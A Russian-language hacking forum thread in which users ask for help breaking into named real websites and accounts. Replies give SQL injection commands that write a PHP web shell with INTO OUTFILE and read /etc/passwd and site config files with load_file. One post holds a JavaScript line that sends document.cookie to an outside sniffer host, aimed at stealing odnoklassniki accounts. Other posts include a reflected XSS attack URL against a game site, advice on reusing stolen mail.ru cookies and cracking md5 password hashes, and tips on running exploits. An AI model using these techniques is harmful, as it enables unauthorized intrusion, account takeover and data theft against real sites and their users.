Ребята, прошу помощи. В общем мне уже очень много попадалось сайтов, на которых подставляя кавычку высвечивалась Sql syntax error, но когда я пытался определить кол-во полей с помощью order by никакой реакции не было, то есть сколько бы я полей не указывал(даже миллионы), страница грузилась нормально и без ошибок, после подбора тоже вроде ничего не происходило. Собственно кто подскажет, как быть и как раскручивать скуль дальше Заранее спасибо!
M@ZAX@KEP
21.10.2012, 01:00
nik_987, это было не грубо, а по делу и существу. Язык действительно нужно знать перед тем, как пытаться взламывать что-то, написанное на этом языке (а если обобщить, то нужно просто знать механизм, который исследуешь, чтобы найти и использовать его уязвимости). Особенно если плохо относишься к havij. Причин, по которым ничего не выводится при order by, может быть множество в зависимости от запроса, в котором ты нашёл скулю.
Здравствуйте уважаемые ! я недавно изучил как использовать XSS, но у меня появились вопросы прошу ответить на них кто знает!
1. как использовать активную xss если оно появляется через двух страниц, то есть пишешь в окне имя скрипт проверки, потом нажимаешь далее соглашаешься с правилами и еще нажимаешь далее, и скрипт работает?
2. как обмануть фильтр, если оно только действует на надпись просто удаляет его, а когда пишу ript>alert("xss") то надписи вижу только не вполняется сам скрипт. а фильтр пропускает любые символы
Цитата:
Сообщение от rumix
Здравствуйте уважаемые ! я недавно изучил как использовать XSS, но у меня появились вопросы прошу ответить на них кто знает!
1. как использовать активную xss если оно появляется через двух страниц, то есть пишешь в окне имя скрипт проверки, потом нажимаешь далее соглашаешься с правилами и еще нажимаешь далее, и скрипт работает?
2. как обмануть фильтр, если оно только действует на надпись просто удаляет его, а когда пишу ript>alert("xss") то надписи вижу только не вполняется сам скрипт. а фильтр пропускает любые символы
1. Вроде бы это пассивка тогда, если ты сам вводишь нужный код.
2. Сделай скриншот что получается в исх.коде для большей ясности.
Dinga, но параметры передаются через post и в гугл хроме тоже появляется окно. вот сайт смотри http://ingala.ru/galaxy/nam.php (https://hpc.name/redirector.html#http://ingala.ru/galaxy/nam.php)
2. там нечего скриншотить. когда пишу alert("xss") то в исходнике вижу alert("xss")
а когда пишу ript>alert("xss") в исходнике вижу alert("xss") но не выполняется в браузере
M@ZAX@KEP
18.11.2012, 01:00
Если пассивка через POST, эксплуатируем как CSRF (https://hpc.name/showthread.php?t=16326) + XSS (пытаемся по крайней мере).
Проскандировал сайт онлайн игры программой XSpider, чтоб найти хоть какую нибудь уязвимость(ну вообще искал xss) и вот он мне что выдал:
Имя сервера : nginx/1.0.4 PHP/5.3.3-7+squeeze8
состояние : 200 (OK)
текущие дата и время : Mon, 12 Nov 2012 20:03:02 GMT
формат содержимого : text/html; charset=utf-8
соединение : close
кэширование : max-age=0
1. PHPSESSID=vn6627qqpt071dq05t1l09rhk1; expires=Thu, 22-Nov-2012 20:03:02 GMT; path=/
2. time4cookie=OK; expires=Mon, 12-Nov-2012 21:03:02 GMT
3. unique_id=1352750582.27921291713178; expires=Thu, 06-Nov-2036 20:03:02 GMT
4. tuid=5764a81ca86517bf; expires=Thu, 06-Nov-2036 20:03:02 GMT
5. adid=3a8e2359ae448f42
6. currentLocale=ru_RU
Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:
//mc.yandex.ru/watch/8034205?ut=noindex
/?state=game&ref_id=100
/?state=remind_password
/?state=library
/?state=forum
/?state=media
/?state=help
/?ptype=4
Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.
Список форм:
POST /?action=login HTTP/1.1
email=&pass=
POST /?action=remind_pass HTTP/1.1
email=
Запрос для выполнения атаки:
http://nebogame.com/?state=game&ref_...cript%3E%3C%22 (https://hpc.name/redirector.html#http://nebogame.com/?state=game&ref_id=%22%3E%3Cscript%3Ealert%28%27%27%29%3C%2Fsc ript%3E%3C%22)
ребятушки подскажите мне неопытному что же можно с этим сделать?
ведь написано что он что то нашёл... (а что именно)???
system-electron
26.11.2012, 01:00
сканеры иногда выдают ложную информацию
foxxx1234
21.12.2012, 01:00
Сори если не в ту тему.
Есть активка "> возможно через нее загрузить скрипт? словo script и все составляющие не проходят. Нужно чтобы работало на подобии
nikitos2020n
03.01.2013, 01:00
сори если не туда написал, кто нибудь ответе на мой вопрос в теме https://hpc.name/showthread.php?t=18890&page=3 , заранее спс
panfilov91
03.02.2013, 01:00
http://www.golowar.ru/news.php?id=67&page= (https://hpc.name/redirector.html#http://www.golowar.ru/news.php?id=67&page=)'
КАК её раскрутить?помогите пожалуйста
LiteDem0
03.02.2013, 01:00
Это даже не XSS! На этом сайте вообще не XSS не SQL injection.
panfilov91
03.02.2013, 01:00
Цитата:
Сообщение от LiteDem0
Это даже не XSS! На этом сайте вообще не XSS не SQL injection.
А что это?
panfilov91
07.02.2013, 01:00
Просканировал сайт своего провайдера через Acunetix Web Vulnerability Scanner 8
Показал что есть уязвимость SSL 2.0 deprecated protocol
Подскажите способы пролома уязвимости! Ссылки, темы, программы.
А вот я имею уже куки чужие от почты mail.ru , но они были давным-давно утащены (лет 5 назад).
Знаю точно, что человек пользуется до сих пор этим мылом (предположим, что и паролем тем-же).
Куки имеют вот такой вид:
remixchk=5
remixmid=25383442
remixemail=логин@list.ru
remixpass=пароль
remixsid=тут тоже длинный код какой-то
P.S.: Извиняюсь за двойное сообщение - случайно запостил первое раньше времени.
Так вот вопрос - прокатят ли эти куки, или все давно уже обновилось у mail.ru ?
Если есть шанс, но куда именно вводить их в Опере, там нет таких "разделов". Есть : b, mrcu,p, s, VID
M@ZAX@KEP
26.03.2013, 01:00
Шансов нет, но если в remixpass пароль в md5, вперёд крэкать хэш.
tigrOOO1
01.04.2013, 01:00
Если я попался на хоней пот
я например из Китая а хоней пот в США мне что то будет если спалюсь?
народ помогите пожалуйста,acunetix нашёл xss и пишет вот такое:
URL encoded POST input weapon was set to '"()&%1prompt(920792)
как это использовать? где? куда вставлять?
Заранее спасибо!!!
Цитата:
Сообщение от fikal
народ помогите пожалуйста,acunetix нашёл xss и пишет вот такое:
URL encoded POST input weapon was set to '"()&%1prompt(920792)
как это использовать? где? куда вставлять?
Заранее спасибо!!!
>>URL encoded POST input weapon was set to
Ты сам ответил на свой вопрос - это XSS
Цитата:
Сообщение от ZoRKeG
>>URL encoded POST input weapon was set to
Ты сам ответил на свой вопрос - это XSS
ну это я понял, ну а дальше что надо ваять? читал разные мануалы но так ине понял куды это надо засовывать, и какие манипуляции делать( Может линк какой нибудь кинешь чтоб по полочкам? или сам если не трудно)))
qwerty333
24.04.2013, 01:00
Цитата:
Сообщение от fikal
ну это я понял, ну а дальше что надо ваять? читал разные мануалы но так ине понял куды это надо засовывать, и какие манипуляции делать( Может линк какой нибудь кинешь чтоб по полочкам? или сам если не трудно)))
выкинь свой сканер на помойку, с ним ты ничему не научишся, и для начала научись пользоватся гуглом, там статей на тему хсс милионы
если залить шелл можно открыть себе любой порт
Цитата:
Сообщение от Rurr
если залить шелл можно открыть себе любой порт
Чувак ты походу темой ошибся, лол.
ТС без шелла тебе ничего не светит в первую очередь
Как вариант можно попробовать сунуть скл запрос чтобы ЗАЛИТЬ ШЕЛЛ (нужно знать полный путь до сайта, как его определить отпишу ниже)
code:
select '' into outfile '/home/hpc.name/shell.php';
если не хватит прав (з.ы file_priv Y может не хватить) пробуешь мини шелл
code:
select '' from mysql.user into outfile '/home/hpc.name/shell.php'
если и эта хуерга не прокатит пробуешь шифрануть запрос sql hex вот сайтеГ _http://x3k.ru/
и опять же пробуешь обе команды, и опять же если не прокатит, или нету достаточно прав либо руки кривые пробуешь слить конфиг админки если данные от него хранятся на сервере, либо в пма покопайся (что уж оч редко =) )
командой
code:
select load_file('/etc/passwd')
/etc/passwd это пример пути вместо него пробуй подобрать путь к конфу, если админка в папке /admin пробуешь примерно так
code:
select load_file('/home/hpc.name/admin/config.php')
если ты везунчик удача тебе улыбнется, а если нет ищи дальше.
Кстати чуть не забыл... полный путь до сайта ты можешь узнать в том же файле /etc/passwd.
з.ыыыыыы я так и не понял, какова ваша цель , опишите поподробней!
За дополнительными вопросами в ЛС. =)
shama1221
26.07.2013, 01:00
Я знаю пароль и логин от одного phpmyadmin, но там закрыт удаленный доступ, я знаю что нужно подключиться к серверу через ssh туннель, что бы можно было зайти в пхп, но подключиться не могу, там закрыты порты 22 и 3306. Есть еще какие нибудь способы?
25isb2010
31.07.2013, 01:00
Ребята, Всем ПРИВЕТ!!!
Подскажите по этим ссылкам действительно можно найти какую нить уязвимость?
Может кто нибудь, сможет указать уязвимость, и вообще реально ли по ним слить базу?
code:
http://gnevbogov.ru/forum/index.php?app=forums&module=forums§ion=markasread&marktype=forum&forumid=13&returntoforumid=0&i=
http://gnevbogov.ru/forum/index.php?forumid=13&returntoforumid=0&i=1&app=forums&module=forums§ion=markasread&marktype=forum
http://gnevbogov.ru/forum/index.php?section=login&app=core&module=global
http://gnevbogov.ru/forum/index.php?app=core§ion=99999999
http://gnevbogov.ru/forum/index.php?module=profile§ion=friends&do=add&member_id=&app=members
http://gnevbogov.ru/forum/index.php?app=core§ion=
http://gnevbogov.ru/forum/index.php?module=profile§ion=friends&do=add&member_id=&app=99999999
http://gnevbogov.ru/forum/index.php?module=profile§ion=friends&do=add&member_id=&app=
http://gnevbogov.ru/forum/index.php?member_id=&app=members&module=profile§ion=friends&do=remove
http://gnevbogov.ru/forum/index.php?app=core&module=search&do=new_posts&search_filter_app[forums]=1
http://gnevbogov.ru/forum/index.php?app=forums&module=forums§ion=markasread&marktype=forum&forumid=13&returntoforumid=0&i=1
http://gnevbogov.ru/forum/index.php?section=login&app=core&module=99999999
http://gnevbogov.ru/forum/index.php?member_id=&app=members&module=profile§ion=friends&do=99999999
Ссылки не мои я их взял на здешнем сайте в раздачах, вот и захотел поинтересоваться! https://hpc.name/showthread.php?t=47142
Барышня которая их раздаёт могла бы сразу уязвимости выложить!
Спасибо надеюсь на ответ.
Цитата:
Сообщение от BlaIzEr
полный путь до сайта ты можешь узнать в том же файле /etc/passwd.
Там не всегда полный путь, иногда просто установочная директория, к примеру, там будет запись мол корень это /usr/local/ а на самом деле корень сайта будет /usr/local/www-data/ (из своего опыта говорю).
Плюс, если работает load_file('/etc/passwd') то лучше сперва залить шелл в /tmp/ и попробовать загрузить его, если гуд - пытаемся искать папку с подходящими правами (/temp/; /tmp/; /uploads/; /test/;).
Цитата:
Сообщение от 25isb2010
Подскажите по этим ссылкам действительно можно найти какую нить уязвимость?
В лом регистрировать на форуме, но скулей вроде не пахнет, а вот XSS +-
25isb2010
01.08.2013, 01:00
Если тебе несложно, подскажи пожалуйста прямой путь к уязвимости.
Спасибо!
Подскажите как я могу этим воспользоваться.
Хы, да тебе повезло. Ты можешь захапать себе весь сервер, т.к в этой Apache есть уязвимость.
Но она вроде работает под бздями (BSD), с SunOs может не прокатить, но все равно попробуй.
Тебе нужно использовать Exploit. Скачай набор Backtrack или Kali Linux.
Там есть такая штука, называется Armitage. Погугли как ей пользоваться)
M@ZAX@KEP
16.08.2013, 01:00
Лучше нагуглить отдельно сплойт и запустить его под своей системой. Качать и ставить целую ОСь ради единичной попытки пробить теоретически уязвимую софтину... гм. Нерационально.
the_Ghost
05.10.2013, 01:00
всем привет. помогите пожалуйста найти на сайте Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
sql уязвимость. у меня что то никак не получается.
the_Ghost
07.10.2013, 01:00
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
что это? похоже на инклуд?
M@ZAX@KEP
08.10.2013, 01:00
Похоже было сначала, но проинклудить что-либо не удалось
djhovo09
25.10.2013, 01:00
здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене
img.src="http://snifer.ejan.ru/img.php?"+document.cookie;
я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер
!function (d, id, did, st) {
var js = d.createElement("script");
js.src = "http://snifer.ejan.ru/connect.js";
js.onload = js.onreadystatechange = function () {
if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
if (!this.executed) {
this.executed = true;
setTimeout(function () {
OK.CONNECT.insertGroupWidget(id,did,st);
}, 0);
}
}}
d.documentElement.appendChild(js);
}(document,"ok_group_widget","52864984219766","{width:250,height:335}");
Цитата:
Сообщение от djhovo09
здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене
Правильно, у тебя и не получиться украсть куки с другого домена.
Ищи пасивку/активку на одноклассниках и действуй, я больше чем уверен - xss там есть
Pokemon-Ruby
03.11.2013, 01:00
http://www.gamenet.ru/beauty/gallery/?sex=&order=1 (https://hpc.name/redirector.html#http://www.gamenet.ru/beauty/gallery/?sex=&order=1) как на этом сайте накрутить голоса?
Цитата:
Сообщение от Pokemon-Ruby
как на этом сайте накрутить голоса?
ты уже достал в овсех темах флудить. Как, как! Берёшь их за хобот и крутишь, крутишь!
Pokemon-Ruby
03.11.2013, 01:00
Цитата:
Сообщение от Yorvet
ты уже достал в овсех темах флудить. Как, как! Берёшь их за хобот и крутишь, крутишь!
так ответа не дали.
Havij v1.16
Сканирование многих сайтов powered by ipb 3.4.n. выдаёт базы данных, таблицы, колонки и значения все в таком виде:
IMAGE (https://hpc.name/redirector.html#http://s017.radikal.ru/i420/1311/74/5e56ff740e25.png) http://s017.radikal.ru/i420/1311/74/5e56ff740e25.png
Бывают и другие символы. Иногда ещё база данных обозначается через UnknownDB, а всё остальное так же.
И не известно, как это читать и понимать. Может быть проблема в Havij?
Hagrid, А ты точно уверен, что там есть уязвимость? Хавджик может просто так эту белиберду выдать! Лучше попробуй руками параметры покрутить, тогда уже и гадать не придется!
тогда создай несколько тестовых сайтов и протестируй, в выдаче увидишь или сканер выдает, или сайт!
666Marat
07.12.2013, 01:00
Привет всем!Помогите мне я просканировал один сайт и нашел вот такое
666Marat
07.12.2013, 01:00
Что с этим можно сделать?
666Marat
08.12.2013, 01:00
Я уже забивал ничего не показало
666Marat, Файл robots.txt - посмотри его, возможно там есть директории с солью
Список форм - возможно они передают параметры в бд, возможно даже и без фильтров!
Список cookie - поиграйся с пряниками
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot